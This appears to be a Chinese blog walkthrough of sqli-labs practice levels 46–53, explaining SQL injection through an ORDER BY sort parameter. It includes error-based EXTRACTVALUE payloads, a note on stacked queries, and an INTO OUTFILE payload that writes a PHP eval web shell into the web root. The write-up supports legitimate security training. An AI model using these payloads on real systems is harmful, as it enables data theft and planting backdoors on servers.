sqli-labs-master 过关 46 - 53(附解题思路及解析)

本文详细介绍了SQL注入攻击的不同类型,包括排序注入、字符型注入、文件写入注入以及堆叠注入。通过示例展示了如何利用`ORDER BY`后的注入点进行攻击,并探讨了如何防范这些注入攻击,强调了在开发中应用参数化查询和输入验证的重要性。
摘要由CSDN通过智能技术生成

目录

第 46 关​

​​第 47 关

第 48 关​​

第 49 关

第 50 关

第 51 关

第 52 关

第 53 关


第 46 关

                        排序注入

源码:	$sql = "SELECT * FROM users ORDER BY $id";

select使用文档:https://dev.mysql.com/doc/refman/8.0/en/select.html

分析:不同于 where 查询后可以用 union select 注入,可见order by后面不能使用联合查询,可以使用    
     limit,into outfile等语句,还可以跟数字等。

?sort=1 AND EXTRACTVALUE(1,(CONCAT(0x7e,(payload),0x7e))) #

 第 47 关

同第 46 关

不同点:字符型,需要用 ' 闭合 ,需要用 --%20注释

?sort=1' AND EXTRACTVALUE(1,(CONCAT(0x7e,(payload),0x7e))) --%20

 第 48 关

注入木马:
?sort=1 INTO OUTFILE "D:/phpstudy2016/An/WWW/Test-48.php" LINES TERMINATED BY '<?php @eval($_POST[pass]) ?>' --%20

 

 第 49 关

同第 48 关

区别:字符型,需要用 ' 闭合

 第 50 关

同第 46 关

区别:因为第 50 关应用了 mysqli_multi_query 函数,所以可以使用堆叠注入。

 第 51 关

  同第 47 关

第 52 关

同第 48 关

 第 53 关

同第 49 关

注:50-53关都可以用堆叠注入。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值